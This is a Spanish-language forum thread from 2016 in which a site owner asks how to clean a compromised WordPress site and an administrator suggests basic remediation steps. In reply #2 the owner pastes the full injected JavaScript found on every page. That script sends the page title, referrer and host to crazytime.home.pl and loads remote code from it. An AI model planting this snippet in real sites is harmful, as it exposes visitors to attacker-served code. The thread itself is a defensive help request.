Mensajero Pilotos conectados
--No estás logeado--
--No estás logeado--
 

CESAV | Comunidad Española Simulación Automovilistica Virtual | LIGA LFS S3 y Assetto Corsa

  • 14:34:29, 07 de Abril del 2025 *
  • Bienvenido(a), Visitante
Por favor ingresa o regístrate.

Ingresar con nombre de usuario, contraseña y duración de la sesión

Autor Tema: Antivirus para worpress  (Leído 18088 veces)

0 Usuarios y 1 Visitante están viendo este tema.

JMiquel

  • Buen Rollito Motorsport
  • *
  • Desconectado Desconectado
  • Mensajes: 316
Antivirus para worpress
« en: 22:25:15, 20 de Enero del 2016 »

Buenas.
Tengo una página hecha con wordpress y hace unos días que hace cosas raras.
La última es que cuando carga las páginas tarda más de lo acostumbrado y mientras carga, en la parte de abajo veo un mensaje que dice "Esperando a crazytime.home.pl...". No sé que es eso. Tengo pocos plugins y ninguno con ese nombre.
Me he instalado esto: https://es.wordpress.org/plugins/all-in-one-wp-security-and-firewall/ para prevenir pero no encuentro una buena herramienta para escanear y limpiar.
¿Algún consejo?
Gracias.
En línea

NeoN

  • Administrator
  • *****
  • Desconectado Desconectado
  • Mensajes: 4.331
    • cesav.es
Re: Antivirus para worpress
« Respuesta #1 en: 22:34:03, 20 de Enero del 2016 »

Te habrán entrado e inyectado codigo malicioso.. La única opción es que limpies la web manualmente, bien restaurando backup si tenias, o eliminando el código manualmente si no tenias copia de seguridad..
En línea

JMiquel

  • Buen Rollito Motorsport
  • *
  • Desconectado Desconectado
  • Mensajes: 316
Re: Antivirus para worpress
« Respuesta #2 en: 22:43:29, 20 de Enero del 2016 »

No sé desde cuando debe estar así.
¿Cómo hago para limpiar manualmente? ¿Cómo sé que archivos están infectados?

La he dado a "ver codigofuente de la página" y me encuentro que todas las páginas tienen esto:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://crazytime.home.pl/js/jquery.min.php"; var n_url = base   "?default_keyword="   default_keyword   "&se_referrer="   se_referrer   "&source="   host; var f_url = base   "?c_utt=snt2014&c_utm="   encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="'   f_url   '">'   '<'   '/script>');}</script>

Pero ¿cómo lo quito?
En línea

NeoN

  • Administrator
  • *****
  • Desconectado Desconectado
  • Mensajes: 4.331
    • cesav.es
Re: Antivirus para worpress
« Respuesta #3 en: 22:51:18, 20 de Enero del 2016 »

Pues conecta por FTP, y busca en que archivo está eso, y lo borras. Estará en uno solo, seguramente en el index.php o en el template..

De todos modos con eso no solucionas nada, ya que si lo ha hecho una vez, lo podrá hacer más veces, así que actualiza wordpress, cambia claves ftp etc
En línea

JMiquel

  • Buen Rollito Motorsport
  • *
  • Desconectado Desconectado
  • Mensajes: 316
Re: Antivirus para worpress
« Respuesta #4 en: 23:19:43, 20 de Enero del 2016 »

Vale, ya lo he encontrado. Estaba en uno de los archivos del tema.
Ahora ya carga mucho más rápido.
El wordpress ya lo tengo actualizado. Cambiaré claves y revisaré usuarios.
Gracias Neón.
En línea

NeoN

  • Administrator
  • *****
  • Desconectado Desconectado
  • Mensajes: 4.331
    • cesav.es
Re: Antivirus para worpress
« Respuesta #5 en: 00:07:05, 21 de Enero del 2016 »

Mira también que no tengas más archivos extraños, y que los permisos de las carpetas sean los justos para que el wp funcione, y que no te puedan colar nada..

De nada, suerte que haya sido solo eso
En línea

JMiquel

  • Buen Rollito Motorsport
  • *
  • Desconectado Desconectado
  • Mensajes: 316
Re: Antivirus para worpress
« Respuesta #6 en: 18:15:48, 22 de Enero del 2016 »

Pues, después de haber limpiado los archivos y de que los proveedores del alojamiento me hicieran un escaneo, hoy me he encontrado otra vez con un script en el mismo archivo del tema que el otro día. ¿Cómo se puede evitar eso? ¿Por dónde entran?
En línea

NeoN

  • Administrator
  • *****
  • Desconectado Desconectado
  • Mensajes: 4.331
    • cesav.es
Re: Antivirus para worpress
« Respuesta #7 en: 18:31:41, 22 de Enero del 2016 »

Analizando logs es la única manera de ver las peticiones al servidor..
En línea

JMiquel

  • Buen Rollito Motorsport
  • *
  • Desconectado Desconectado
  • Mensajes: 316
Re: Antivirus para worpress
« Respuesta #8 en: 19:00:59, 22 de Enero del 2016 »

Buf, no sé cómo se hace eso.
¿Dónde encuentro esos logs?
¿Tiene que ser alguna opcion del panel de control o tengo que mirar por ftp alguna carpeta en concreto?
En línea

NeoN

  • Administrator
  • *****
  • Desconectado Desconectado
  • Mensajes: 4.331
    • cesav.es
Re: Antivirus para worpress
« Respuesta #9 en: 19:13:28, 22 de Enero del 2016 »

En el panel de control lo debes tener, pero no en el panel del wp, sino del hosting
En línea

JMiquel

  • Buen Rollito Motorsport
  • *
  • Desconectado Desconectado
  • Mensajes: 316
Re: Antivirus para worpress
« Respuesta #10 en: 23:08:13, 22 de Enero del 2016 »

Sí, entiendo. Pues no lo encuentro. Preguntaré a los del hosting. Gracias.
En línea

JMiquel

  • Buen Rollito Motorsport
  • *
  • Desconectado Desconectado
  • Mensajes: 316
Re: Antivirus para worpress
« Respuesta #11 en: 20:42:07, 12 de Febrero del 2016 »

Bueno. sigo con problemas en mi web. Ahora, los del hosting me la han bloqueado porque dicen que hay envío de spam desde mi web...
Me dicen que lo mejor seria que eliminase todo y montase una página nueva.
Como es una página sencillita creo que no voy a discutir mucho y miraré de hacerlo.
Lo que pasa es que no domino el tema. Hace años le instalé el Wordpress y luego todo lo he ido haciendo desde el panel de wordpress.
Mi primera pregunta es: Eliminar todo quiere decir eliminar todas las carpetas que veo desde el ftp? Es decir: anon_ftp, bin, cgi-bin, conf, dev, error_docs, etc, httpdocs, httpsdocs, lib, lib64, pd, private, statistics, subdomains, tmp, usr, var, web_users? O sólo es la httpdocs que es dónde tengo el wordpress?
Gracias.
En línea

NeoN

  • Administrator
  • *****
  • Desconectado Desconectado
  • Mensajes: 4.331
    • cesav.es
Re: Antivirus para worpress
« Respuesta #12 en: 13:06:58, 13 de Febrero del 2016 »

Si lo que tienes es un wordpress, no vayas a empezar la web de 0, simplemente borras el sistema de archivos wp, y metes la última versión disponible. Conectas con la base de datos y listo.

Pero si quien sea tiene acceso a tu host como imagino que lo tiene, esa solución te va a durar 2 dias.. Es posible incluso que tenga una cuenta registrada en wp, o tenga la clave de administrador, o haya creado una cuenta admin.. Muchas opciones son posibles.

Con que empresa de hosting lo tienes contratado?

Es importante también ver que permisos tienen las carpetas, no sea que lo tengas todo con 777 y te la estén colando por ahí
En línea

JMiquel

  • Buen Rollito Motorsport
  • *
  • Desconectado Desconectado
  • Mensajes: 316
Re: Antivirus para worpress
« Respuesta #13 en: 18:11:27, 13 de Febrero del 2016 »

Ok. Bueno, a la gestión de la web sólo entramos dos usuarios. Si les cambio la contraseña y elimino alguno más que pueda haber ya lo tendría más controlado, no?

El wp está en la carpeta httpdocs. ¿Las demás sirven? ¿Las puedo eliminar?

El proveedor es Virtualpyme.

Las carpetas del wp las tengo con permisos 755.
En línea

NeoN

  • Administrator
  • *****
  • Desconectado Desconectado
  • Mensajes: 4.331
    • cesav.es
Re: Antivirus para worpress
« Respuesta #14 en: 18:50:24, 13 de Febrero del 2016 »

No se si sirven o no, depende como tengan montando el host, lo que me parece es caro xD
Puedes mirar lo que hay en el contenido de esas carpetas y te haces una idea a ver..

No se, empieza por cambiar las 2 claves esas, metes un wp actualizado y limpio, y lo conectas a ver como va..
En línea
 

CESAV ©2009-2025
Página generada en 0.00489 segundos con 11 consultas a la base de datos

Esta web utiliza cookies, puedes ver nuestra política de cookies aquí. Si continuas navegando, estás aceptándola. Cerrar